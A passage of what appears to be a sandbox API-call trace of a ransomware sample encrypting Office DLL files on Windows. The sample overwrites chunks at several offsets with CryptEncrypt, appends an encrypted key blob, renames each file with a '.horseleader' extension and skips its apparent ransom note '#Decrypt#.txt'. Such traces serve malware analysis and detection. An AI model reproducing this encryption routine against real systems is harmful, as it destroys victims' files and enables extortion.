Shared\\OFFICE14\\ACEDAO.DLL") returned 70 [0237.868] StrStrW (lpFirst="ACEDAO.DLL", lpSrch=".txt") returned 0x0 [0237.868] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=744888) returned 1 [0237.868] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.868] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.010] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0238.011] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.011] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x586dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.011] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.148] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0238.149] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.149] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xb0db8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.149] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.258] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0238.258] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.258] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.259] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0238.259] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0238.259] CloseHandle (hObject=0x158) returned 1 [0238.259] GetProcessHeap () returned 0x780000 [0238.259] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0238.260] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.horseleader") returned 82 [0238.260] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll.horseleader")) returned 1 [0238.261] GetProcessHeap () returned 0x780000 [0238.261] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0238.261] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81925f00, ftCreationTime.dwHighDateTime=0x1caca23, ftLastAccessTime.dwLowDateTime=0x51128590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81925f00, ftLastWriteTime.dwHighDateTime=0x1caca23, nFileSizeHigh=0x0, nFileSizeLow=0xa990, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEERR.DLL", cAlternateFileName="")) returned 1 [0238.261] lstrcmpiW (lpString1="ACEERR.DLL", lpString2="Windows") returned -1 [0238.261] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 70 [0238.261] StrStrIW (lpFirst="ACEERR.DLL", lpSrch=".horseleader") returned 0x0 [0238.261] lstrcmpW (lpString1="ACEERR.DLL", lpString2="#Decrypt#.txt") returned 1 [0238.261] lstrcmpW (lpString1="ACEERR.DLL", lpString2="_uninstalling_.png") returned 1 [0238.261] lstrlenW (lpString=".testttjffg") returned 11 [0238.261] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL", lpSrch=".testttjffg") returned 0x0 [0238.261] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0238.261] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0238.261] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0238.513] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 70 [0238.513] StrStrW (lpFirst="ACEERR.DLL", lpSrch=".txt") returned 0x0 [0238.513] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=43408) returned 1 [0238.513] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.578] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0238.578] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.579] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.691] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0238.691] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.692] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x990, lpOverlapped=0x0) returned 1 [0238.692] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff670, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0238.692] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x990, lpOverlapped=0x0) returned 1 [0238.692] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.692] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0238.692] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0238.692] CloseHandle (hObject=0x158) returned 1 [0238.693] GetProcessHeap () returned 0x780000 [0238.693] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0238.693] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.horseleader") returned 82 [0238.693] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll.horseleader")) returned 1 [0238.694] GetProcessHeap () returned 0x780000 [0238.694] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0238.694] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd8117300, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0xf73a8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEES.DLL", cAlternateFileName="")) returned 1 [0238.694] lstrcmpiW (lpString1="ACEES.DLL", lpString2="Windows") returned -1 [0238.694] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 69 [0238.694] StrStrIW (lpFirst="ACEES.DLL", lpSrch=".horseleader") returned 0x0 [0238.694] lstrcmpW (lpString1="ACEES.DLL", lpString2="#Decrypt#.txt") returned 1 [0238.694] lstrcmpW (lpString1="ACEES.DLL", lpString2="_uninstalling_.png") returned 1 [0238.694] lstrlenW (lpString=".testttjffg") returned 11 [0238.694] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL", lpSrch=".testttjffg") returned 0x0 [0238.694] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0238.694] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0238.694] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0238.699] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 69 [0238.699] StrStrW (lpFirst="ACEES.DLL", lpSrch=".txt") returned 0x0 [0238.699] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1012648) returned 1 [0238.699] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.699] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.702] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0238.702] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.702] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x791d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.702] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.765] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0238.765] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.765] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xf23a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.765] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.839] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0238.839] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.839] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.840] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0238.840] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0238.840] CloseHandle (hObject=0x158) returned 1 [0238.840] GetProcessHeap () returned 0x780000 [0238.841] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0238.841] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL.horseleader") returned 81 [0238.841] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll.horseleader")) returned 1 [0238.842] GetProcessHeap () returned 0x780000 [0238.842] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0238.842] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd8117300, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x6bfa0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEEXCH.DLL", cAlternateFileName="")) returned 1 [0238.842] lstrcmpiW (lpString1="ACEEXCH.DLL", lpString2="Windows") returned -1 [0238.842] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 71 [0238.842] StrStrIW (lpFirst="ACEEXCH.DLL", lpSrch=".horseleader") returned 0x0 [0238.842] lstrcmpW (lpString1="ACEEXCH.DLL", lpString2="#Decrypt#.txt") returned 1 [0238.842] lstrcmpW (lpString1="ACEEXCH.DLL", lpString2="_uninstalling_.png") returned 1 [0238.843] lstrlenW (lpString=".testttjffg") returned 11 [0238.843] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL", lpSrch=".testttjffg") returned 0x0 [0238.843] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0238.843] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0238.843] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0238.844] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 71 [0238.844] StrStrW (lpFirst="ACEEXCH.DLL", lpSrch=".txt") returned 0x0 [0238.844] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=442272) returned 1 [0238.844] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.844] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.368] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0239.368] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.368] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x337d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.368] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.446] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0239.446] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.446] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x66fa0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.446] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.481] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0239.481] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.481] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.481] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0239.481] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0239.482] CloseHandle (hObject=0x158) returned 1 [0239.482] GetProcessHeap () returned 0x780000 [0239.482] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0239.482] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL.horseleader") returned 83 [0239.482] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll.horseleader")) returned 1 [0239.484] GetProcessHeap () returned 0x780000 [0239.484] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0239.484] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd813d460, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0xdbb98, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEEXCL.DLL", cAlternateFileName="")) returned 1 [0239.484] lstrcmpiW (lpString1="ACEEXCL.DLL", lpString2="Windows") returned -1 [0239.484] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 71 [0239.484] StrStrIW (lpFirst="ACEEXCL.DLL", lpSrch=".horseleader") returned 0x0 [0239.484] lstrcmpW (lpString1="ACEEXCL.DLL", lpString2="#Decrypt#.txt") returned 1 [0239.484] lstrcmpW (lpString1="ACEEXCL.DLL", lpString2="_uninstalling_.png") returned 1 [0239.484] lstrlenW (lpString=".testttjffg") returned 11 [0239.484] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL", lpSrch=".testttjffg") returned 0x0 [0239.484] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0239.484] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0239.484] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0239.485] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 71 [0239.485] StrStrW (lpFirst="ACEEXCL.DLL", lpSrch=".txt") returned 0x0 [0239.485] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=899992) returned 1 [0239.485] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.485] ReadFile (in: hFile=0x158, 